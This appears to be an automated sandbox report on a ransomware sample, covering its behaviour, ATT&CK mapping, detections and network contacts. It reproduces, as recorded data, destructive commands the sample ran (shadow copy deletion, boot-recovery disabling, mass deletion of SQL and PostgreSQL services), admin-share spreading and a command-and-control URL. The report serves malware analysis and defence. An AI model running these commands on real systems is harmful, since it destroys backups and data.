        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setup\refcount.iniJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setup\NULLJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\NULLJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setupJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38Jump to behavior
        Source: Settings.index0.0.drBinary or memory string: hyper-v
        Source: malware.exe, 00000000.00000003.2046813837.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1687616867.0000000004AF9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1780416429.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1736160630.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1744281507.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1684403681.0000000004AF9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1959826564.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2041675211.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1754207883.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1713388544.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1678179924.0000000004AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: malware.exe, 00000000.00000003.1685614425.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1785769862.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1813084478.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2247464482.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2182773970.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1753956972.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1796662055.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2234598919.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1677352666.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1680940988.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2219665386.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\PT
        Source: Settings.index0.0.drBinary or memory string: hyper-vOs and f
        Source: C:\Users\user\Desktop\malware.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c sc delete "mssqlfdlauncher"&&sc delete "mssqlserver"&&sc delete "sqlserveragent"&&sc delete "sqlbrowser"&&sc delete "sqltelemetry"&&sc delete "msdtsserver130"&&sc delete "ssistelemetry130"&&sc delete "sqlwriter"&&sc delete "mssql$veeamsql2012"&&sc delete "sqlagent$veeamsql2012"&&sc delete "mssql"&&sc delete "sqlagent"&&sc delete "mssqlserveradhelper100"&&sc delete "mssqlserverolapservice"&&sc delete "msdtsserver100"&&sc delete "reportserver"&&sc delete "sqltelemetry$hl"&&sc delete "tmbmserver"&&sc delete "mssql$progid"&&sc delete "mssql$wolterskluwer"&&sc delete "sqlagent$progid"&&sc delete "sqlagent$wolterskluwer"&&sc delete "mssqlfdlauncher$optima"&&sc delete "mssql$optima"&&sc delete "sqlagent$optima"&&sc delete "reportserver$optima"&&sc delete "msftesql$sqlexpress"&&sc delete "postgresql-x64-9.4"&&rem kill "sql"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im msdtssrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im ssms.exe&&taskkill -f -im sqlagent.exe&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im reportingservicesservice.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c sc delete "mssqlfdlauncher"&&sc delete "mssqlserver"&&sc delete "sqlserveragent"&&sc delete "sqlbrowser"&&sc delete "sqltelemetry"&&sc delete "msdtsserver130"&&sc delete "ssistelemetry130"&&sc delete "sqlwriter"&&sc delete "mssql$veeamsql2012"&&sc delete "sqlagent$veeamsql2012"&&sc delete "mssql"&&sc delete "sqlagent"&&sc delete "mssqlserveradhelper100"&&sc delete "mssqlserverolapservice"&&sc delete "msdtsserver100"&&sc delete "reportserver"&&sc delete "sqltelemetry$hl"&&sc delete "tmbmserver"&&sc delete "mssql$progid"&&sc delete "mssql$wolterskluwer"&&sc delete "sqlagent$progid"&&sc delete "sqlagent$wolterskluwer"&&sc delete "mssqlfdlauncher$optima"&&sc delete "mssql$optima"&&sc delete "sqlagent$optima"&&sc delete "reportserver$optima"&&sc delete "msftesql$sqlexpress"&&sc delete "postgresql-x64-9.4"&&rem kill "sql"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im msdtssrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im ssms.exe&&taskkill -f -im sqlagent.exe&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im reportingservicesservice.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FILE RECOVERY.txt VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Opens network shares
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\224.0.0.22\admin$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\224.0.0.22\admin$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\224.0.0.22\c$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\224.0.0.22\c$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\192.168.2.1\admin$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\192.168.2.1\c$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\192.168.2.1\c$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: \\192.168.2.1\c$\bozon.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeDirectory queried: C:\Documents and SettingsJump to behavior
        Source: C:\Users\user\Desktop\malware.exeDirectory queried: C:\Documents and SettingsJump to behavior
        Source: C:\Users\user\Desktop\malware.exeDirectory queried: number of queries: 1001

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Replication Through Removable Media        		1
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		11
        Input Capture        		11
        Peripheral Device Discovery        		Remote Services1
        Data from Local System        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts1
        Service Execution        		1
        Windows Service        		1
        Windows Service        		1
        File Deletion        		LSASS Memory22
        File and Directory Discovery        		Remote Desktop Protocol11
        Input Capture        		1
        Encrypted Channel        		Exfiltration Over Bluetooth1
        Inhibit System Recovery
        Email AddressesDNS ServerDomain AccountsAt1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Masquerading        		Security Account Manager12
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron1
        Bootkit        		1
        Registry Run Keys / Startup Folder        		21
        Virtualization/Sandbox Evasion        		NTDS1
        Network Share Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection        		LSA Secrets1
        Query Registry        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Hidden Files and Directories        		Cached Domain Credentials1
        Security Software Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Bootkit        		DCSync1
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem21
        Virtualization/Sandbox Evasion        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
        System Network Configuration Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570605 Sample: malware Startdate: 07/12/2024 Architecture: WINDOWS Score: 100 42 whyers.io 2->42 44 api.ipify.org 2->44 52 Multi AV Scanner detection for domain / URL 2->52 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 10 other signatures 2->58 8 malware.exe 3 1028 2->8         started        13 notepad.exe 2->13         started        signatures3 process4 dnsIp5 46 whyers.io 13.248.169.48, 443, 49733, 49734 AMAZON-02US United States 8->46 48 192.168.2.1, 135, 274 unknown unknown 8->48 50 3 other IPs or domains 8->50 34 App169641711805066...46-350AA0582B94.log, DOS 8->34 dropped 36 C:\Program Files\Adobe\...\ui-strings.js, COM 8->36 dropped 38 C:\...\prep_ui_win32_bundle_V8_perf.cache, data 8->38 dropped 40 281 other malicious files 8->40 dropped 60 May disable shadow drive data (uses vssadmin) 8->60 62 Creates files in the recycle bin to hide itself 8->62 64 Deletes shadow drive data (may be related to ransomware) 8->64 66 4 other signatures 8->66 15 vssadmin.exe 1 8->15         started        18 cmd.exe 1 8->18         started        20 cmd.exe 1 8->20         started        22 cmd.exe 1 8->22         started        file6 signatures7 process8 signatures9 68 Deletes shadow drive data (may be related to ransomware) 15->68 24 conhost.exe 15->24         started        26 conhost.exe 18->26         started        28 sc.exe 1 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 22->32         started        process10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        malware.exe100%ReversingLabsWin32.Ransomware.GarrantyDecrypt
        malware.exe82%VirustotalBrowse
        malware.exe100%AviraHEUR/AGEN.1319003
        malware.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        whyers.io17%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://whyers.io/QWEwqdsvsf/ap.phps0%Avira URL Cloudsafe
        https://whyers.io/)0%Avira URL Cloudsafe
        https://whyers.io/s0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpt0%Avira URL Cloudsafe
        https://whyers.io/30%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpy0%Avira URL Cloudsafe
        https://webstore.google.com/0%Avira URL Cloudsafe
        http://css3pie.com0%Avira URL Cloudsafe
        https://whyers.io/0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpnd0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpContent-Type:0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpQWEwqdsvsf/ap.php0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.php0%Avira URL Cloudsafe
        http://api.ipify.orgx32x64%s0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phpg0%Avira URL Cloudsafe
        https://whyers.io/QWEwqdsvsf/ap.phps17%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        whyers.io
        		13.248.169.48
        		truetrueunknown
        api.ipify.org
        		172.67.74.152
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://api.ipify.org/false
            		high
            https://whyers.io/QWEwqdsvsf/ap.phptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://whyers.io/3malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://whyers.io/QWEwqdsvsf/ap.phpsmalware.exe, 00000000.00000003.1729388605.0000000004D50000.00000004.00000020.00020000.00000000.sdmptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://whyers.io/smalware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://whyers.io/QWEwqdsvsf/ap.phptmalware.exe, 00000000.00000003.2041675211.0000000004AC9000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://jquery.org/licenseindex.html.0.drfalse
              		high
              https://whyers.io/)malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://webstore.google.com/resources.pak0.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://whyers.io/QWEwqdsvsf/ap.phpymalware.exe, 00000000.00000003.1763717846.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1769660512.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1754054435.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1756661483.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1759582601.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1742531721.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1762438430.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1747377941.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1729388605.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1770992838.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1771865574.0000000004D4F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://sizzlejs.com/index.html.0.drfalse
                		high
                http://css3pie.comindex.html.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://whyers.io/malware.exe, 00000000.00000003.1857834155.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2321452398.0000000004D56000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2303264795.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1925943676.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2252053063.0000000004D56000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2375208096.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2191393645.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1922502022.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2432004957.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1919160838.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1839868357.0000000004AED000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2189324109.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2369982423.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500906615.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185245833.0000000004D4F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://whyers.io/QWEwqdsvsf/ap.phpndmalware.exe, 00000000.00000003.2041675211.0000000004AC9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://whyers.io/QWEwqdsvsf/ap.phpContent-Type:malware.exetrue
                • Avira URL Cloud: safe
                		unknown
                http://crbug.com/775961resources.pak0.0.drfalse
                  		high
                  https://www.torproject.org/download/malware.exe, FILE RECOVERY.txt421.0.dr, FILE RECOVERY.txt215.0.dr, FILE RECOVERY.txt529.0.dr, FILE RECOVERY.txt102.0.dr, FILE RECOVERY.txt183.0.dr, FILE RECOVERY.txt230.0.dr, FILE RECOVERY.txt348.0.dr, FILE RECOVERY.txt58.0.dr, FILE RECOVERY.txt349.0.dr, FILE RECOVERY.txt573.0.dr, FILE RECOVERY.txt342.0.dr, FILE RECOVERY.txt28.0.dr, FILE RECOVERY.txt446.0.dr, FILE RECOVERY.txt401.0.dr, FILE RECOVERY.txt97.0.dr, FILE RECOVERY.txt285.0.dr, FILE RECOVERY.txt324.0.dr, FILE RECOVERY.txt409.0.dr, FILE RECOVERY.txt571.0.dr, FILE RECOVERY.txt598.0.drfalse
                    		high
                    https://whyers.io/QWEwqdsvsf/ap.phpQWEwqdsvsf/ap.phpmalware.exe, 00000000.00000003.1887164409.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1868651794.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1977014914.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1855694509.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2037221890.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1987432788.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2022464109.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2005801076.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1980943375.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1960503217.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1873661843.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2002388849.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1846105138.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1902261303.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1846576841.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1962199418.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2019688647.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2013453165.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2042488475.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1994372794.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2005382194.0000000004AC9000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://jquery.com/index.html.0.drfalse
                      		high
                      http://api.ipify.orgx32x64%smalware.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://whyers.io/QWEwqdsvsf/ap.phpgmalware.exe, 00000000.00000003.1796881992.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1794658829.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1789533041.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1788942681.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1807188084.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1801556961.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.1784852079.0000000004D4F000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://api.ipify.orgmalware.exe, 00000000.00000003.1698970841.0000000004A71000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        13.248.169.48
                        		whyers.ioUnited States
                        		16509AMAZON-02UStrue
                        172.67.74.152
                        		api.ipify.orgUnited States
                        		13335CLOUDFLARENETUSfalse

                        Private

                        IP
                        192.168.2.2
                        192.168.2.1
                        192.168.2.3

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1570605
                        Start date and time:2024-12-07 12:40:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 51s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:malware.exe
                        (renamed file extension from none to exe)
                        Original Sample Name:malware
                        Detection:MAL
                        Classification:mal100.rans.spyw.evad.winEXE@16/1027@2/5
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Report size getting too big, too many NtWriteFile calls found.

                        Simulations

